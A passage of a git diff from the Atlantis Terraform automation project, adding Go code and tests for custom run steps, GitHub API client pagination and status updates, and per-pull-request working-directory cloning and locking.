+ out, err := cmd.CombinedOutput()
+
+ commandStr := strings.Join(command, " ")
+ if err != nil {
+ err = fmt.Errorf("%s: running %q in %q: \n%s", err, commandStr, path, out)
+ ctx.Log.Debug("error: %s", err)
+ return string(out), err
+ }
+ ctx.Log.Info("successfully ran %q in %q", commandStr, path)
+ return string(out), nil
+}
diff --git a/server/events/runtime/run_step_runner_test.go b/server/events/runtime/run_step_runner_test.go
new file mode 100644
index 0000000000..c206e1c491
--- /dev/null
+++ b/server/events/runtime/run_step_runner_test.go
@@ -0,0 +1,77 @@
+package runtime_test
+
+import (
+ "strings"
+ "testing"
+
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/runtime"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRunStepRunner_Run(t *testing.T) {
+ cases := []struct {
+ Command string
+ ExpOut string
+ ExpErr string
+ }{
+ {
+ Command: "",
+ ExpErr: "no commands for run step",
+ },
+ {
+ Command: "echo hi",
+ ExpOut: "hi\n",
+ },
+ {
+ Command: "echo hi >> file && cat file",
+ ExpOut: "hi\n",
+ },
+ {
+ Command: "lkjlkj",
+ ExpErr: "exit status 127: running \"lkjlkj\" in",
+ },
+ {
+ Command: "echo workspace=$WORKSPACE version=$ATLANTIS_TERRAFORM_VERSION dir=$DIR",
+ ExpOut: "workspace=myworkspace version=0.11.0 dir=$DIR\n",
+ },
+ }
+
+ projVersion, err := version.NewVersion("v0.11.0")
+ Ok(t, err)
+ defaultVersion, _ := version.NewVersion("0.8")
+ r := runtime.RunStepRunner{
+ DefaultTFVersion: defaultVersion,
+ }
+ ctx := models.ProjectCommandContext{
+ Log: logging.NewNoopLogger(),
+ Workspace: "myworkspace",
+ RepoRelDir: "mydir",
+ ProjectConfig: &valid.Project{
+ TerraformVersion: projVersion,
+ Workspace: "myworkspace",
+ Dir: "mydir",
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.Command, func(t *testing.T) {
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ var split []string
+ if c.Command != "" {
+ split = strings.Split(c.Command, " ")
+ }
+ out, err := r.Run(ctx, split, tmpDir)
+ if c.ExpErr != "" {
+ ErrContains(t, c.ExpErr, err)
+ return
+ }
+ Ok(t, err)
+ expOut := strings.Replace(c.ExpOut, "dir=$DIR", "dir="+tmpDir, -1)
+ Equals(t, expOut, out)
+ })
+ }
+}
diff --git a/server/events/runtime/runtime.go b/server/events/runtime/runtime.go
new file mode 100644
index 0000000000..8e599ff659
--- /dev/null
+++ b/server/events/runtime/runtime.go
@@ -0,0 +1,22 @@
+// Package runtime handles constructing an execution graph for each action
+// based on configuration and defaults. The handlers can then execute this
+// graph.
+package runtime
+
+import (
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/logging"
+)
+
+type TerraformExec interface {
+ RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
+}
+
+// MustConstraint returns a constraint. It panics on error.
+func MustConstraint(constraint string) version.Constraints {
+ c, err := version.NewConstraint(constraint)
+ if err != nil {
+ panic(err)
+ }
+ return c
+}
diff --git a/server/events/terraform/terraform_client.go b/server/events/terraform/terraform_client.go
index de3d6d23a4..b34516c7c7 100644
--- a/server/events/terraform/terraform_client.go
+++ b/server/events/terraform/terraform_client.go
@@ -32,7 +32,6 @@ import (
type Client interface {
Version() *version.Version
RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
- Init(log *logging.SimpleLogger, path string, workspace string, extraInitArgs []string, version *version.Version) ([]string, error)
}
type DefaultClient struct {
@@ -43,20 +42,16 @@ type DefaultClient struct {
const terraformPluginCacheDirName = "plugin-cache"
// zeroPointNine constrains the version to be 0.9.*
-var zeroPointNine = MustConstraint(">=0.9,<0.10")
var versionRegex = regexp.MustCompile("Terraform v(.*)\n")
func NewClient(dataDir string) (*DefaultClient, error) {
- // todo: use exec.LookPath to find out if we even have terraform rather than
- // parsing the error looking for a not found error.
+ _, err := exec.LookPath("terraform")
+ if err != nil {
+ return nil, errors.New("terraform not found in $PATH. \n\nDownload terraform from https://www.terraform.io/downloads.html")
+ }
versionCmdOutput, err := exec.Command("terraform", "version").CombinedOutput() // #nosec
output := string(versionCmdOutput)
if err != nil {
- // exec.go line 35, Error() returns
- // "exec: " + strconv.Quote(e.Name) + ": " + e.Err.Error()
- if err.Error() == fmt.Sprintf("exec: \"terraform\": %s", exec.ErrNotFound.Error()) {
- return nil, errors.New("terraform not found in $PATH. \n\nDownload terraform from https://www.terraform.io/downloads.html")
- }
return nil, errors.Wrapf(err, "running terraform version: %s", output)
}
match := versionRegex.FindStringSubmatch(output)
@@ -87,35 +82,39 @@ func (c *DefaultClient) Version() *version.Version {
}
// RunCommandWithVersion executes the provided version of terraform with
-// the provided args in path. v is the version of terraform executable to use
-// and workspace is the workspace specified by the user commenting
-// "atlantis plan/apply {workspace}" which is set to "default" by default.
+// the provided args in path. v is the version of terraform executable to use.
+// If v is nil, will use the default version.
+// Workspace is the terraform workspace to run in. We won't switch workspaces
+// but will set the TERRAFORM_WORKSPACE environment variable.
func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) {
tfExecutable := "terraform"
+ tfVersionStr := c.defaultVersion.String()
// if version is the same as the default, don't need to prepend the version name to the executable
- if !v.Equal(c.defaultVersion) {
+ if v != nil && !v.Equal(c.defaultVersion) {
tfExecutable = fmt.Sprintf("%s%s", tfExecutable, v.String())
+ tfVersionStr = v.String()
}
- // set environment variables
- // this is to support scripts to use the WORKSPACE, ATLANTIS_TERRAFORM_VERSION
- // and DIR variables in their scripts
- // append current process's environment variables
- // this is to prevent the $PATH variable being removed from the environment
+ // We add custom variables so that if `extra_args` is specified with env
+ // vars then they'll be substituted.
envVars := []string{
// Will de-emphasize specific commands to run in output.
"TF_IN_AUTOMATION=true",
// Cache plugins so terraform init runs faster.
fmt.Sprintf("TF_PLUGIN_CACHE_DIR=%s", c.terraformPluginCacheDir),
fmt.Sprintf("WORKSPACE=%s", workspace),
- fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", v.String()),
+ fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", tfVersionStr),
fmt.Sprintf("DIR=%s", path),
}
+ // Append current Atlantis process's environment variables so PATH is
+ // preserved and any vars that users purposely exec'd Atlantis with.
envVars = append(envVars, os.Environ()...)
// append terraform executable name with args
tfCmd := fmt.Sprintf("%s %s", tfExecutable, strings.Join(args, " "))
+ // We use 'sh -c' so that if extra_args have been specified with env vars,
+ // ex. -var-file=$WORKSPACE.tfvars, then they get substituted.
terraformCmd := exec.Command("sh", "-c", tfCmd) // #nosec
terraformCmd.Dir = path
terraformCmd.Env = envVars
@@ -130,58 +129,6 @@ func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path st
return string(out), nil
}
-// Init executes "terraform init" and "terraform workspace select" in path.
-// workspace is the workspace to select and extraInitArgs are additional arguments
-// applied to the init command. version is the terraform version being executed.
-// Init is guaranteed to be called with version >= 0.9 since the init command
-// was only introduced in that version. It properly handles the renaming of the
-// env command to workspace since 0.10.
-//
-// Returns the string outputs of running each command.
-func (c *DefaultClient) Init(log *logging.SimpleLogger, path string, workspace string, extraInitArgs []string, version *version.Version) ([]string, error) {
- var outputs []string
-
- output, err := c.RunCommandWithVersion(log, path, append([]string{"init", "-no-color"}, extraInitArgs...), version, workspace)
- outputs = append(outputs, output)
- if err != nil {
- return outputs, err
- }
-
- workspaceCommand := "workspace"
- runningZeroPointNine := zeroPointNine.Check(version)
- if runningZeroPointNine {
- // In 0.9.* `env` was used instead of `workspace`
- workspaceCommand = "env"
- }
-
- // Use `workspace show` to find out what workspace we're in now. If we're
- // already in the right workspace then no need to switch. This will save us
- // about ten seconds. This command is only available in > 0.10.
- if !runningZeroPointNine {
- workspaceShowOutput, err := c.RunCommandWithVersion(log, path, []string{workspaceCommand, "show"}, version, workspace) // nolint:vetshadow
- outputs = append(outputs, workspaceShowOutput)
- if err != nil {
- return outputs, err
- }
- if strings.TrimSpace(workspaceShowOutput) == workspace {
- return outputs, nil
- }
- }
-
- output, err = c.RunCommandWithVersion(log, path, []string{workspaceCommand, "select", "-no-color", workspace}, version, workspace)
- outputs = append(outputs, output)
- if err != nil {
- // If terraform workspace select fails we run terraform workspace
- // new to create a new workspace automatically.
- output, err = c.RunCommandWithVersion(log, path, []string{workspaceCommand, "new", "-no-color", workspace}, version, workspace)
- outputs = append(outputs, output)
- if err != nil {
- return outputs, err
- }
- }
- return outputs, nil
-}
-
// MustConstraint will parse one or more constraints from the given
// constraint string. The string must be a comma-separated list of
// constraints. It panics if there is an error.
diff --git a/server/events/vcs/client_test.go b/server/events/vcs/client_test.go
index 61060cd3b2..08ab443935 100644
--- a/server/events/vcs/client_test.go
+++ b/server/events/vcs/client_test.go
@@ -13,5 +13,4 @@
//
package vcs
-// todo: actually test
// purposefully empty to trigger coverage report
diff --git a/server/events/vcs/fixtures/fixtures.go b/server/events/vcs/fixtures/fixtures.go
index e3155f1992..6939162032 100644
--- a/server/events/vcs/fixtures/fixtures.go
+++ b/server/events/vcs/fixtures/fixtures.go
@@ -15,6 +15,14 @@ package fixtures
import "github.com/google/go-github/github"
+var PullEvent = github.PullRequestEvent{
+ Sender: &github.User{
+ Login: github.String("user"),
+ },
+ Repo: &Repo,
+ PullRequest: &Pull,
+}
+
var Pull = github.PullRequest{
Head: &github.PullRequestBranch{
SHA: github.String("sha256"),
diff --git a/server/events/vcs/github_client_internal_test.go b/server/events/vcs/github_client_internal_test.go
index 0769e8691f..71ac0371f0 100644
--- a/server/events/vcs/github_client_internal_test.go
+++ b/server/events/vcs/github_client_internal_test.go
@@ -76,3 +76,17 @@ func TestSplitAtMaxChars(t *testing.T) {
})
}
}
+
+// If the hostname is github.com, should use normal BaseURL.
+func TestNewGithubClient_GithubCom(t *testing.T) {
+ client, err := NewGithubClient("github.com", "user", "pass")
+ Ok(t, err)
+ Equals(t, "https://api.github.com/", client.client.BaseURL.String())
+}
+
+// If the hostname is a non-github hostname should use the right BaseURL.
+func TestNewGithubClient_NonGithub(t *testing.T) {
+ client, err := NewGithubClient("example.com", "user", "pass")
+ Ok(t, err)
+ Equals(t, "https://example.com/api/v3/", client.client.BaseURL.String())
+}
diff --git a/server/events/vcs/github_client_test.go b/server/events/vcs/github_client_test.go
new file mode 100644
index 0000000000..04678bc5fb
--- /dev/null
+++ b/server/events/vcs/github_client_test.go
@@ -0,0 +1,149 @@
+package vcs_test
+
+import (
+ "crypto/tls"
+ "fmt"
+ "io/ioutil"
+ "net/http"
+ "net/http/httptest"
+ "net/url"
+ "testing"
+
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/vcs"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+// GetModifiedFiles should make multiple requests if more than one page
+// and concat results.
+func TestGithubClient_GetModifiedFiles(t *testing.T) {
+ respTemplate := `[
+ {
+ "sha": "bbcd538c8e72b8c175046e27cc8f907076331401",
+ "filename": "%s",
+ "status": "added",
+ "additions": 103,
+ "deletions": 21,
+ "changes": 124,
+ "blob_url": "https://github.com/octocat/Hello-World/blob/6dcb09b5b57875f334f61aebed695e2e4193db5e/file1.txt",
+ "raw_url": "https://github.com/octocat/Hello-World/raw/6dcb09b5b57875f334f61aebed695e2e4193db5e/file1.txt",
+ "contents_url": "https://api.github.com/repos/octocat/Hello-World/contents/file1.txt?ref=6dcb09b5b57875f334f61aebed695e2e4193db5e",
+ "patch": "@@ -132,7 +132,7 @@ module Test @@ -1000,7 +1000,7 @@ module Test"
+ }
+]`
+ firstResp := fmt.Sprintf(respTemplate, "file1.txt")
+ secondResp := fmt.Sprintf(respTemplate, "file2.txt")
+ testServer := httptest.NewTLSServer(
+ http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ switch r.RequestURI {
+ // The first request should hit this URL.
+ case "/api/v3/repos/owner/repo/pulls/1/files?per_page=300":
+ // We write a header that means there's an additional page.
+ w.Header().Add("Link", `; rel="next",
+ ; rel="last"`)
+ w.Write([]byte(firstResp)) // nolint: errcheck
+ return
+ // The second should hit this URL.
+ case "/api/v3/repos/owner/repo/pulls/1/files?page=2&per_page=300":
+ w.Write([]byte(secondResp)) // nolint: errcheck
+ default:
+ t.Errorf("got unexpected request at %q", r.RequestURI)
+ http.Error(w, "not found", http.StatusNotFound)
+ return
+ }
+ }))
+
+ testServerURL, err := url.Parse(testServer.URL)
+ Ok(t, err)
+ client, err := vcs.NewGithubClient(testServerURL.Host, "user", "pass")
+ Ok(t, err)
+ defer disableSSLVerification()()
+
+ files, err := client.GetModifiedFiles(models.Repo{
+ FullName: "owner/repo",
+ Owner: "owner",
+ Name: "repo",
+ CloneURL: "",
+ SanitizedCloneURL: "",
+ VCSHost: models.VCSHost{
+ Type: models.Github,
+ Hostname: "github.com",
+ },
+ }, models.PullRequest{
+ Num: 1,
+ })
+ Ok(t, err)
+ Equals(t, []string{"file1.txt", "file2.txt"}, files)
+}
+
+func TestGithubClient_UpdateStatus(t *testing.T) {
+ cases := []struct {
+ status vcs.CommitStatus
+ expState string
+ }{
+ {
+ vcs.Pending,
+ "pending",
+ },
+ {
+ vcs.Success,
+ "success",
+ },
+ {
+ vcs.Failed,
+ "failure",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.status.String(), func(t *testing.T) {
+ testServer := httptest.NewTLSServer(
+ http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ switch r.RequestURI {
+ case "/api/v3/repos/owner/repo/statuses/":
+ body, err := ioutil.ReadAll(r.Body)
+ Ok(t, err)
+ exp := fmt.Sprintf(`{"state":"%s","description":"description","context":"Atlantis"}%s`, c.expState, "\n")
+ Equals(t, exp, string(body))
+ defer r.Body.Close() // nolint: errcheck
+ w.WriteHeader(http.StatusOK)
+ default:
+ t.Errorf("got unexpected request at %q", r.RequestURI)
+ http.Error(w, "not found", http.StatusNotFound)
+ return
+ }
+ }))
+
+ testServerURL, err := url.Parse(testServer.URL)
+ Ok(t, err)
+ client, err := vcs.NewGithubClient(testServerURL.Host, "user", "pass")
+ Ok(t, err)
+ defer disableSSLVerification()()
+
+ err = client.UpdateStatus(models.Repo{
+ FullName: "owner/repo",
+ Owner: "owner",
+ Name: "repo",
+ CloneURL: "",
+ SanitizedCloneURL: "",
+ VCSHost: models.VCSHost{
+ Type: models.Github,
+ Hostname: "github.com",
+ },
+ }, models.PullRequest{
+ Num: 1,
+ }, c.status, "description")
+ Ok(t, err)
+ })
+ }
+}
+
+// disableSSLVerification disables ssl verification for the global http client
+// and returns a function to be called in a defer that will re-enable it.
+func disableSSLVerification() func() {
+ orig := http.DefaultTransport.(*http.Transport).TLSClientConfig
+ http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true}
+ return func() {
+ http.DefaultTransport.(*http.Transport).TLSClientConfig = orig
+ }
+}
diff --git a/server/events/vcs/mocks/mock_client.go b/server/events/vcs/mocks/mock_client.go
index 56aa654b35..025488befd 100644
--- a/server/events/vcs/mocks/mock_client.go
+++ b/server/events/vcs/mocks/mock_client.go
@@ -35,8 +35,8 @@ func (mock *MockClient) GetModifiedFiles(repo models.Repo, pull models.PullReque
return ret0, ret1
}
-func (mock *MockClient) CreateComment(repo models.Repo, pull models.PullRequest, comment string) error {
- params := []pegomock.Param{repo, pull, comment}
+func (mock *MockClient) CreateComment(repo models.Repo, pullNum int, comment string) error {
+ params := []pegomock.Param{repo, pullNum, comment}
result := pegomock.GetGenericMockFrom(mock).Invoke("CreateComment", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
var ret0 error
if len(result) != 0 {
@@ -124,8 +124,8 @@ func (c *Client_GetModifiedFiles_OngoingVerification) GetAllCapturedArguments()
return
}
-func (verifier *VerifierClient) CreateComment(repo models.Repo, pull models.PullRequest, comment string) *Client_CreateComment_OngoingVerification {
- params := []pegomock.Param{repo, pull, comment}
+func (verifier *VerifierClient) CreateComment(repo models.Repo, pullNum int, comment string) *Client_CreateComment_OngoingVerification {
+ params := []pegomock.Param{repo, pullNum, comment}
methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "CreateComment", params)
return &Client_CreateComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
}
@@ -135,21 +135,21 @@ type Client_CreateComment_OngoingVerification struct {
methodInvocations []pegomock.MethodInvocation
}
-func (c *Client_CreateComment_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) {
- repo, pull, comment := c.GetAllCapturedArguments()
- return repo[len(repo)-1], pull[len(pull)-1], comment[len(comment)-1]
+func (c *Client_CreateComment_OngoingVerification) GetCapturedArguments() (models.Repo, int, string) {
+ repo, pullNum, comment := c.GetAllCapturedArguments()
+ return repo[len(repo)-1], pullNum[len(pullNum)-1], comment[len(comment)-1]
}
-func (c *Client_CreateComment_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) {
+func (c *Client_CreateComment_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []int, _param2 []string) {
params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
if len(params) > 0 {
_param0 = make([]models.Repo, len(params[0]))
for u, param := range params[0] {
_param0[u] = param.(models.Repo)
}
- _param1 = make([]models.PullRequest, len(params[1]))
+ _param1 = make([]int, len(params[1]))
for u, param := range params[1] {
- _param1[u] = param.(models.PullRequest)
+ _param1[u] = param.(int)
}
_param2 = make([]string, len(params[2]))
for u, param := range params[2] {
diff --git a/server/events/vcs/vcs_test.go b/server/events/vcs/vcs_test.go
new file mode 100644
index 0000000000..5333ff26fe
--- /dev/null
+++ b/server/events/vcs/vcs_test.go
@@ -0,0 +1,19 @@
+package vcs_test
+
+import (
+ "testing"
+
+ "github.com/runatlantis/atlantis/server/events/vcs"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestStatus_String(t *testing.T) {
+ cases := map[vcs.CommitStatus]string{
+ vcs.Pending: "pending",
+ vcs.Success: "success",
+ vcs.Failed: "failed",
+ }
+ for k, v := range cases {
+ Equals(t, v, k.String())
+ }
+}
diff --git a/server/events/working_dir.go b/server/events/working_dir.go
new file mode 100644
index 0000000000..191eb3c247
--- /dev/null
+++ b/server/events/working_dir.go
@@ -0,0 +1,150 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+ "os"
+ "os/exec"
+ "path/filepath"
+ "strconv"
+ "strings"
+
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/logging"
+)
+
+const workingDirPrefix = "repos"
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_working_dir.go WorkingDir
+
+// WorkingDir handles the workspace on disk for running commands.
+type WorkingDir interface {
+ // Clone git clones headRepo, checks out the branch and then returns the
+ // absolute path to the root of the cloned repo.
+ Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error)
+ // GetWorkingDir returns the path to the workspace for this repo and pull.
+ // If workspace does not exist on disk, error will be of type os.IsNotExist.
+ GetWorkingDir(r models.Repo, p models.PullRequest, workspace string) (string, error)
+ // Delete deletes the workspace for this repo and pull.
+ Delete(r models.Repo, p models.PullRequest) error
+ DeleteForWorkspace(r models.Repo, p models.PullRequest, workspace string) error
+}
+
+// FileWorkspace implements WorkingDir with the file system.
+type FileWorkspace struct {
+ DataDir string
+ // TestingOverrideCloneURL can be used during testing to override the URL
+ // that is cloned. If it's empty then we clone normally.
+ TestingOverrideCloneURL string
+}
+
+// Clone git clones headRepo, checks out the branch and then returns the absolute
+// path to the root of the cloned repo. If the repo already exists and is at
+// the right commit it does nothing. This is to support running commands in
+// multiple dirs of the same repo without deleting existing plans.
+func (w *FileWorkspace) Clone(
+ log *logging.SimpleLogger,
+ baseRepo models.Repo,
+ headRepo models.Repo,
+ p models.PullRequest,
+ workspace string) (string, error) {
+ cloneDir := w.cloneDir(baseRepo, p, workspace)
+
+ // If the directory already exists, check if it's at the right commit.
+ // If so, then we do nothing.
+ if _, err := os.Stat(cloneDir); err == nil {
+ log.Debug("clone directory %q already exists, checking if it's at the right commit", cloneDir)
+ revParseCmd := exec.Command("git", "rev-parse", "HEAD") // #nosec
+ revParseCmd.Dir = cloneDir
+ output, err := revParseCmd.CombinedOutput()
+ if err != nil {
+ log.Err("will re-clone repo, could not determine if was at correct commit: git rev-parse HEAD: %s: %s", err, string(output))
+ return w.forceClone(log, cloneDir, headRepo, p)
+ }
+ currCommit := strings.Trim(string(output), "\n")
+ if currCommit == p.HeadCommit {
+ log.Debug("repo is at correct commit %q so will not re-clone", p.HeadCommit)
+ return cloneDir, nil
+ }
+ log.Debug("repo was already cloned but is not at correct commit, wanted %q got %q", p.HeadCommit, currCommit)
+ // We'll fall through to re-clone.
+ }
+
+ // Otherwise we clone the repo.
+ return w.forceClone(log, cloneDir, headRepo, p)
+}
+
+func (w *FileWorkspace) forceClone(log *logging.SimpleLogger,
+ cloneDir string,
+ headRepo models.Repo,
+ p models.PullRequest) (string, error) {
+
+ err := os.RemoveAll(cloneDir)
+ if err != nil {
+ return "", errors.Wrapf(err, "deleting dir %q before cloning", cloneDir)
+ }
+
+ // Create the directory and parents if necessary.
+ log.Info("creating dir %q", cloneDir)
+ if err := os.MkdirAll(cloneDir, 0700); err != nil {
+ return "", errors.Wrap(err, "creating new workspace")
+ }
+
+ log.Info("git cloning %q into %q", headRepo.SanitizedCloneURL, cloneDir)
+ cloneURL := headRepo.CloneURL
+ if w.TestingOverrideCloneURL != "" {
+ cloneURL = w.TestingOverrideCloneURL
+ }
+ cloneCmd := exec.Command("git", "clone", cloneURL, cloneDir) // #nosec
+ if output, err := cloneCmd.CombinedOutput(); err != nil {
+ return "", errors.Wrapf(err, "cloning %s: %s", headRepo.SanitizedCloneURL, string(output))
+ }
+
+ // Check out the branch for this PR.
+ log.Info("checking out branch %q", p.Branch)
+ checkoutCmd := exec.Command("git", "checkout", p.Branch) // #nosec
+ checkoutCmd.Dir = cloneDir
+ if err := checkoutCmd.Run(); err != nil {
+ return "", errors.Wrapf(err, "checking out branch %s", p.Branch)
+ }
+ return cloneDir, nil
+}
+
+// GetWorkingDir returns the path to the workspace for this repo and pull.
+func (w *FileWorkspace) GetWorkingDir(r models.Repo, p models.PullRequest, workspace string) (string, error) {
+ repoDir := w.cloneDir(r, p, workspace)
+ if _, err := os.Stat(repoDir); err != nil {
+ return "", errors.Wrap(err, "checking if workspace exists")
+ }
+ return repoDir, nil
+}
+
+// Delete deletes the workspace for this repo and pull.
+func (w *FileWorkspace) Delete(r models.Repo, p models.PullRequest) error {
+ return os.RemoveAll(w.repoPullDir(r, p))
+}
+
+// Delete deletes the working dir for this workspace.
+func (w *FileWorkspace) DeleteForWorkspace(r models.Repo, p models.PullRequest, workspace string) error {
+ return os.RemoveAll(w.cloneDir(r, p, workspace))
+}
+
+func (w *FileWorkspace) repoPullDir(r models.Repo, p models.PullRequest) string {
+ return filepath.Join(w.DataDir, workingDirPrefix, r.FullName, strconv.Itoa(p.Num))
+}
+
+func (w *FileWorkspace) cloneDir(r models.Repo, p models.PullRequest, workspace string) string {
+ return filepath.Join(w.repoPullDir(r, p), workspace)
+}
diff --git a/server/events/working_dir_locker.go b/server/events/working_dir_locker.go
new file mode 100644
index 0000000000..6c5559b415
--- /dev/null
+++ b/server/events/working_dir_locker.go
@@ -0,0 +1,78 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+ "fmt"
+ "sync"
+)
+
+//go:generate pegomock generate --use-experimental-model-gen --package mocks -o mocks/mock_working_dir_locker.go WorkingDirLocker
+
+// WorkingDirLocker is used to prevent multiple commands from executing
+// at the same time for a single repo, pull, and workspace. We need to prevent
+// this from happening because a specific repo/pull/workspace has a single workspace
+// on disk and we haven't written Atlantis (yet) to handle concurrent execution
+// within this workspace.
+type WorkingDirLocker interface {
+ // TryLock tries to acquire a lock for this repo, workspace and pull.
+ // It returns a function that should be used to unlock the workspace and
+ // an error if the workspace is already locked. The error is expected to
+ // be printed to the pull request.
+ TryLock(repoFullName string, workspace string, pullNum int) (func(), error)
+ // Unlock deletes the lock for this repo, workspace and pull. If there was no
+ // lock it will do nothing.
+ Unlock(repoFullName, workspace string, pullNum int)
+}
+
+// DefaultWorkingDirLocker implements WorkingDirLocker.
+type DefaultWorkingDirLocker struct {
+ mutex sync.Mutex
+ locks map[string]interface{}
+}
+
+// NewDefaultWorkingDirLocker is a constructor.
+func NewDefaultWorkingDirLocker() *DefaultWorkingDirLocker {
+ return &DefaultWorkingDirLocker{
+ locks: make(map[string]interface{}),
+ }
+}
+
+func (d *DefaultWorkingDirLocker) TryLock(repoFullName string, workspace string, pullNum int) (func(), error) {
+ d.mutex.Lock()
+ defer d.mutex.Unlock()
+
+ key := d.key(repoFullName, workspace, pullNum)
+ _, exists := d.locks[key]
+ if exists {
+ return func() {}, fmt.Errorf("the %s workspace is currently locked by another"+
+ " command that is running for this pull request–"+
+ "wait until the previous command is complete and try again", workspace)
+ }
+ d.locks[key] = true
+ return func() {
+ d.Unlock(repoFullName, workspace, pullNum)
+ }, nil
+}
+
+// Unlock unlocks the repo, pull and workspace.
+func (d *DefaultWorkingDirLocker) Unlock(repoFullName, workspace string, pullNum int) {
+ d.mutex.Lock()
+ defer d.mutex.Unlock()
+ delete(d.locks, d.key(repoFullName, workspace, pullNum))
+}
+
+func (d *DefaultWorkingDirLocker) key(repo string, workspace string, pull int) string {
+ return fmt.Sprintf("%s/%s/%d", repo, workspace, pull)
+}
diff --git a/server/events/working_dir_locker_test.go b/server/events/working_dir_locker_test.go
new file mode 100644
index 0000000000..52274af3ab
--- /dev/null
+++ b/server/events/working_dir_locker_test.go
@@ -0,0 +1,154 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events_test
+
+import (
+ "testing"
+
+ "github.com/runatlantis/atlantis/server/events"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+var repo = "repo/owner"
+var workspace = "default"
+
+func TestTryLock(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+
+ // The first lock should succeed.
+ unlockFn, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+
+ // Now another lock for the same repo, workspace, and pull should fail
+ _, err = locker.TryLock(repo, workspace, 1)
+ ErrEquals(t, "the default workspace is currently locked by another"+
+ " command that is running for this pull request–"+
+ "wait until the previous command is complete and try again", err)
+
+ // Unlock should work.
+ unlockFn()
+ _, err = locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+}
+
+func TestTryLockDifferentWorkspaces(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+
+ t.Log("a lock for the same repo and pull but different workspace should succeed")
+ _, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ _, err = locker.TryLock(repo, "new-workspace", 1)
+ Ok(t, err)
+
+ t.Log("and both should now be locked")
+ _, err = locker.TryLock(repo, workspace, 1)
+ Assert(t, err != nil, "exp err")
+ _, err = locker.TryLock(repo, "new-workspace", 1)
+ Assert(t, err != nil, "exp err")
+}
+
+func TestTryLockDifferentRepo(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+
+ t.Log("a lock for a different repo but the same workspace and pull should succeed")
+ _, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ newRepo := "owner/newrepo"
+ _, err = locker.TryLock(newRepo, workspace, 1)
+ Ok(t, err)
+
+ t.Log("and both should now be locked")
+ _, err = locker.TryLock(repo, workspace, 1)
+ ErrContains(t, "currently locked", err)
+ _, err = locker.TryLock(newRepo, workspace, 1)
+ ErrContains(t, "currently locked", err)
+}
+
+func TestTryLockDifferentPulls(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+
+ t.Log("a lock for a different pull but the same repo and workspace should succeed")
+ _, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ newPull := 2
